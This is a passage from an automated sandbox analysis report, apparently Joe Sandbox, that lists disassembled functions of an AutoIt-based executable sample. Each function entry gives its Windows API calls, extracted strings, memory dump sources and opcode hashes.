                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: 83a6bdc302321408c0836ac433ae1b2c001a4e35be53fc5ed91661b22ec3c506
                                        • Instruction ID: 60779724b404159bc1401fe711f8a269466289b4e41a7e1dda97ffd498433d7c
                                        • Opcode Fuzzy Hash: 83a6bdc302321408c0836ac433ae1b2c001a4e35be53fc5ed91661b22ec3c506
                                        • Instruction Fuzzy Hash: D4E06D71141228BADB221FA2DC0DEDB7F1CEF227A2F808010B90E85870CA71D585CBE0
                                        Function 0033B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 0033B0C5
                                        • SetTextColor.GDI32(?,000000FF), ref: 0033B0CF
                                        • SetBkMode.GDI32(?,00000001), ref: 0033B0E4
                                        • GetStockObject.GDI32(00000005), ref: 0033B0EC
                                        • GetWindowDC.USER32(?,00000000), ref: 0039ECFA
                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0039ED07
                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0039ED20
                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0039ED39
                                        • GetPixel.GDI32(00000000,?,?), ref: 0039ED59
                                        • ReleaseDC.USER32(?,00000000), ref: 0039ED64
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                        • String ID:
                                        • API String ID: 1946975507-0
                                        • Opcode ID: b66d998b7ab04eedbc52c723df44f377fec338935a19ffc99166fe2b1b2b079e
                                        • Instruction ID: a35cad4f9d0e8d72d80fb4b3f5e7d555b1185eb954f66f4b1290d5789a9eb7bd
                                        • Opcode Fuzzy Hash: b66d998b7ab04eedbc52c723df44f377fec338935a19ffc99166fe2b1b2b079e
                                        • Instruction Fuzzy Hash: AEE0ED71500240AEEF635F78AC497987B25AB56335F148266F76A580E2C7724581DB11
                                        Function 0039C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: b22fc8877a404c67e0b61aa2708b5926a463f325175455ad4d30372159f542b6
                                        • Instruction ID: 71b356ab4629da56e4ba3cc7e193debeb2faaa88bfd839e1e94be4d33ff607e7
                                        • Opcode Fuzzy Hash: b22fc8877a404c67e0b61aa2708b5926a463f325175455ad4d30372159f542b6
                                        • Instruction Fuzzy Hash: 92E04FB1500200EFDB025F70DC486697BADEB4D350F11C405FC4B8BA60DB7499818B00
                                        Function 0039C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: eb56a0e163ac0075c8e94b122f9c1d5e7c9f0178e47034250c3ea829e8185542
                                        • Instruction ID: b1aa527b3db67e7a5063d90cece492efbb60274ac77ff710cac8514c83b75586
                                        • Opcode Fuzzy Hash: eb56a0e163ac0075c8e94b122f9c1d5e7c9f0178e47034250c3ea829e8185542
                                        • Instruction Fuzzy Hash: 6FE046B1900200EFDB029F70DC886A97BADEB4D360F11C405F94B8BA60DBB899818B00
                                        Function 003A2350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: >$DEFINE
                                        • API String ID: 4104443479-1664449232
                                        • Opcode ID: cf37183ada476ab01b0bd47d4f2eebdfe26c35fee01d41d588de59e47d004aee
                                        • Instruction ID: e92815e4499bce4fb69c5227ee99dba1275ade144a4bbee4e92381156b9b140a
                                        • Opcode Fuzzy Hash: cf37183ada476ab01b0bd47d4f2eebdfe26c35fee01d41d588de59e47d004aee
                                        • Instruction Fuzzy Hash: 78127C75E0021ADFCF26CF59D490AADB7B1FF4A310F26815AE855AB350D730AD85CB90
                                        Function 0035EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0035ECA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ContainedObject
                                        • String ID: AutoIt3GUI$Container
                                        • API String ID: 3565006973-3941886329
                                        • Opcode ID: 4ede4ad28b70cf2c5d980f4e4d4abbfd09c0383b043432c86562011e48198bc8
                                        • Instruction ID: 92062f43ad0dacb9f167f73184c29cd2239dad32b59f747f6e698d9d67fc8d87
                                        • Opcode Fuzzy Hash: 4ede4ad28b70cf2c5d980f4e4d4abbfd09c0383b043432c86562011e48198bc8
                                        • Instruction Fuzzy Hash: 039167746003019FDB19CF64C884E6ABBF9BF48712B14846EED4ACF6A1DBB0E944CB50
                                        Function 0036E704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00323BCF: _wcscpy.LIBCMT ref: 00323BF2
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • __wcsnicmp.LIBCMT ref: 0036E785
                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0036E84E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                        • String ID: LPT
                                        • API String ID: 3222508074-1350329615
                                        • Opcode ID: 0440bb1fcfc792cbdbef0b1a4094ad7e030043fd0bfc1c109432d4339af59b5b
                                        • Instruction ID: 434954db0fe2f36ded8a1ec8765c833ba86b3ca5da2b8d2b796ae42f793bfd86
                                        • Opcode Fuzzy Hash: 0440bb1fcfc792cbdbef0b1a4094ad7e030043fd0bfc1c109432d4339af59b5b
                                        • Instruction Fuzzy Hash: F4617279A00225AFCB16DF94C895EEEB7F8EF09710F058069F506AB391DB70AE44CB50
                                        Function 00321B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00321B83
                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00321B9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        • Opcode ID: 94210f99c6ecfb0a4d4776db99add9111e92410fbd2ba55e9c9e0a200a952589
                                        • Instruction ID: 2b60d8e228b8ef541367a4fa47fa6cb5dcc816ab22f740d8b6d15f7042a0ffc5
                                        • Opcode Fuzzy Hash: 94210f99c6ecfb0a4d4776db99add9111e92410fbd2ba55e9c9e0a200a952589
                                        • Instruction Fuzzy Hash: 8F513A72408744ABE322AF14D885BAFBBECFF99354F41484DF1C8450A6EB71956CC762
                                        Function 0036CE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032417D: __fread_nolock.LIBCMT ref: 0032419B
                                        • _wcscmp.LIBCMT ref: 0036CF49
                                        • _wcscmp.LIBCMT ref: 0036CF5C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscmp$__fread_nolock
                                        • String ID: FILE
                                        • API String ID: 4029003684-3121273764
                                        • Opcode ID: df33907ff99a6c6609cf3b496315f25b67b8ae62e3d730cb07ac6a815a937e88
                                        • Instruction ID: c3f4f0c7be9fc4ca19298d9f4fdbdcc630cc1e5efbb9f230fd1034613e71d118
                                        • Opcode Fuzzy Hash: df33907ff99a6c6609cf3b496315f25b67b8ae62e3d730cb07ac6a815a937e88
                                        • Instruction Fuzzy Hash: 9841E332A00219BADF22DBA4DC81FEF7BBA9F49710F004469F601EF195D771AA54C760
                                        Function 00349AF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0034889E: __getptd_noexit.LIBCMT ref: 0034889E
                                        • __getbuf.LIBCMT ref: 00349B8A
                                        • __lseeki64.LIBCMT ref: 00349BFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __getbuf__getptd_noexit__lseeki64
                                        • String ID: pM5
                                        • API String ID: 3311320906-3100918825
                                        • Opcode ID: d3c72d75f6088c840f009ce051a69385643373a391b8edccefad98d1724b2039
                                        • Instruction ID: 43bca4cecb2ae7c8ae71f3ef916c7648f2053e061c82b48210b9422fedbd8291
                                        • Opcode Fuzzy Hash: d3c72d75f6088c840f009ce051a69385643373a391b8edccefad98d1724b2039
                                        • Instruction Fuzzy Hash: D7411F71900B059ED73A8F28D891B7B77E8EB45330F15861EE8AA8F6D1E774F8408B50
                                        Function 0038A578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0038A668
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0038A67D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: '
                                        • API String ID: 3850602802-1997036262
                                        • Opcode ID: 02359af4705aeadf8b4ba5fc2ea699d6a992835f8f7aa48286074b72b7f41691
                                        • Instruction ID: 685be5e6fc4df005bb5202f68490aa5301313d255327047794ea53b5a9de9029
                                        • Opcode Fuzzy Hash: 02359af4705aeadf8b4ba5fc2ea699d6a992835f8f7aa48286074b72b7f41691
                                        • Instruction Fuzzy Hash: 07411875A00709DFEB15DF68D880BDA7BB9FB09300F1501AAE945EB385E770A941CFA1
                                        Function 00389567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?), ref: 0038961B
                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00389657
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$DestroyMove
                                        • String ID: static
                                        • API String ID: 2139405536-2160076837
                                        • Opcode ID: d4b4fd2cd0de1b87ad61c85610d3c13520221a0fa94efc98674df760e882baa6
                                        • Instruction ID: ddba01d3a01676707256662c43dd97754057959f51c6ca56b81fdb113c5876bc
                                        • Opcode Fuzzy Hash: d4b4fd2cd0de1b87ad61c85610d3c13520221a0fa94efc98674df760e882baa6
                                        • Instruction Fuzzy Hash: EB319031500604AEEB12AF74DC81BFB77ADFF49764F15851AF8A9C7190DA319C81D760
                                        Function 0035D0D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 0035D0ED
                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0035D127
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: bf040fafb3bd37d404c888d44d28689c80d9f6c8d47c910c82fa5b85010ef184
                                        • Instruction ID: ce8b6102dbd1f8a330f7f51d69ff614580be0f40dcbcf0fdfdaa3ffc7e98eaf7
                                        • Opcode Fuzzy Hash: bf040fafb3bd37d404c888d44d28689c80d9f6c8d47c910c82fa5b85010ef184
                                        • Instruction Fuzzy Hash: 5721E972D00615ABCB23EF94D881DEEB779EF88701F128029ED05AB2A0EB705D05C790
                                        Function 00365B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00365BE4
                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00365C1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: InfoItemMenu_memset
                                        • String ID: 0
                                        • API String ID: 2223754486-4108050209
                                        • Opcode ID: e9f6f4874cf918d6faa78473187ba5583733c157554d696cd742f138651554f5
                                        • Instruction ID: 3c4dfb8eb86e707a5948989b916603248b497741d7e0b1f7a645221ba2fceffd
                                        • Opcode Fuzzy Hash: e9f6f4874cf918d6faa78473187ba5583733c157554d696cd742f138651554f5
                                        • Instruction Fuzzy Hash: 0231B971600709EBDB26CF99C989BADBBF8EF05350F198039E9819B1A4D7709944DF50
                                        Function 00376B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        • __snwprintf.LIBCMT ref: 00376BDD
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __snwprintf_memmove
                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                        • API String ID: 3506404897-2584243854
                                        • Opcode ID: 473e87c4ab21781855b7b2b5248218fb5e28c5bee437d4ec0bf0749a19f8ab34
                                        • Instruction ID: 851ad4a24c9f22860d3a62599cb72ea191ed2724aa9af602f14266ed62893a72
                                        • Opcode Fuzzy Hash: 473e87c4ab21781855b7b2b5248218fb5e28c5bee437d4ec0bf0749a19f8ab34
                                        • Instruction Fuzzy Hash: 1821BF32600529AACF13EF94D892EEE77B5EF45700F104465F509AB282DB74EE41CBA2
                                        Function 0038936B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003686AE: GetLocalTime.KERNEL32 ref: 003686BB
                                          • Part of subcall function 003686AE: _wcsncpy.LIBCMT ref: 003686F0
                                          • Part of subcall function 003686AE: _wcsncpy.LIBCMT ref: 00368722
                                          • Part of subcall function 003686AE: _wcsncpy.LIBCMT ref: 00368755
                                          • Part of subcall function 003686AE: _wcsncpy.LIBCMT ref: 00368797
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00389405
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcsncpy$LocalMessageSendTime
                                        • String ID: @U=u$SysDateTimePick32
                                        • API String ID: 2466184910-2530228043
                                        • Opcode ID: a5c0f37a31ce135fecd524a216c6dda073d3ee9b2541ec6852775496379e417f
